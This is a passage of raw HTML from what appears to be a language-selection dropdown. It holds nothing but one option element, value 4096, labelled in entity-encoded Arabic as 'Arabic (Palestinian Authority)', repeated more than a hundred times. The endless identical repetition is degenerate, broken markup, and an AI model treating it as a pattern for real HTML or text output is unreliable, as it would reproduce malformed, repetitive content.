&#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; 